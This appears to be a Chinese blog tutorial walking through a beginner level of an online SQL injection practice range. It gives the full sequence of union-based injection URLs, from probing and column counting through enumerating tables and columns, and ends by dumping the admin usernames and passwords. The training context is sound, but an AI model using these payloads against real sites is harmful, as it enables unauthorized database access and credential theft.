SQL注入攻击(基础)

书生这次准备了一份sql注入攻击的靶场演练教程

以封神台在线演练靶场为例（像游戏一样一关关过），就说第一章吧

题目如下：

要求是通过sql注入来获得管理员的密码

点击传送门，出现这样一个网页：

那么，第一步，确定目标，这里是：

http://rhiq8003.ia.aqlab.cn/

接下来第二步，来判断这里是否存在SQL注入的漏洞

开始操作：

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1      //然后回车

看来，页面返回正常，接着下一个

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2   //回车(之后就不再写了，知道回车显示页面就行)

看，页面返回不正常了，所以我判断，这里可能会存在一个SQL注入漏洞

好，开始第三步，判断他有多少字段

一步步来，从1开始试探

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 1

可以看到页面显示正常，接下来，测2

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 2

页面返回正常，然后测3

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 3

哦豁，页面返回多少有点不正常了，此时就可以判断出他的字段数为2

开始第四步，判断回显在哪里

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,2

这里显示为2，表明了我们想要的就在2这里显示

第五步，重要的来了，开始查询相关的我所需要的内容

先查数据库名称：

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,database()

出来了，maoshe

接着，我们来查看数据库的版本：

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,version()

版本5.5.53

接着再来查表名，就这样一步步的往下走

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()limit 0,1

出现了，admin表，一般管理员的账号密码都是存在于这个表里面

再接着，查字段名：

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

出来了，第一个字段名id

再就查第二个：

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

第二个字段名username

再查第三个：

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

第三个字段名，password。至此数据库maoshe的admin表里的三个字段都出来了

分别为id，username，password

最后一步，查询username字段的内容，判断有几个用户：

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,username from admin limit 0,1

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,username from admin limit 1,1

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,username from admin limit 2,1

limit 2,1没有回显

至此，判断为有两个用户，分别为admin，ppt#*@#（这不兴写出来，自己点图片看）

然后，查询密码：

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin limit 0,1

这是用户admin的密码，为hellohack

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin limit 1,1

第二个用户ppt****密码为：zkaqbanban

Sql注入成功，成功得到管理员账号与密码

好了，文章到此结束。希望各位初学的看官多思考，掌握技巧。

声明：本文仅作学习使用，切勿做违法乱纪之事，如有相关情况，与本文作者无关。

浪客书生，以键证道...

SQL注入攻击(基础)相关推荐

基于pikachu漏洞平台的 --SQL注入攻击学习与总结
SQL注入攻击基础知识常见注释符号使用示例 pikachu 漏洞联系平台 -- SQL注入 SQL注入攻击流程注入点类型数字型注入(POST) 字符型注入(GET) 搜索型注入 XX型注入 ...
mysql注入攻击实_三十三、MySQL基础系列笔记之MySQL安全问题与SQL注入攻击
SQL注入攻击大多数与程序有关系,程序不严谨是导致SQL注入攻击成功的一个原因.安全问题不容忽视,平常的开发中应关注安全问题.下面简单记录PHP中的SQL攻击问题. 什么是SQL注入攻击 SQL注入( ...
从入门到入土：[SEED-Lab]-SQL注入攻击|SQL Injection Attack Lab|详细说明|实验步骤|实验截图
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...
SQL注入攻击总结篇
本文是关于SQL各种类型数据库的注入攻击自我复习总结,如果文中有不足的地方,麻烦大佬在评论中指出或者私聊我,谢谢- 本文讲述: SQL注入的原理 SQL注入的防御 SQL攻击的流程其他数据库的注入方 ...
sql注入漏洞，应屏蔽SQL注入攻击
2019独角兽企业重金招聘Python工程师标准>>> 注:SQL注入好比是前端URL传参数请求时参数以SQL 做为参数传入,如 select 1 from dual where ...
SQL注入攻击及防御手动注入+sqlmap自动化注入实战（网络安全学习12）
CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...
SQL注入攻击的原理、分类和防御方法
一.SQL注入攻击原理恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行. 二.SQ ...
使用BurpSuite实验室练习SQL注入攻击
因为之前对HTTP和Java都不熟悉,所以想要一开始就使用实验室师兄给的在线平台练习有点困难.好在我在一本参考书上看到推荐使用BurpSuite的在线实验室,又因为前段时间我恰好学习了Burp的网络扫 ...
什么是SQL注入攻击？SQL注入攻击原理是什么?
SQL注入攻击是网络安全中非常常见的攻击方式之一,该攻击隐蔽性好.危害大.操作方便,也是各大企业及站长最容易遇到的攻击方式.那么SQL注入攻击原理是什么?如何防范?接下来跟着小编来看看吧. SQL注入 ...

SQL注入攻击(基础)

SQL注入攻击(基础)相关推荐

最新文章

热门文章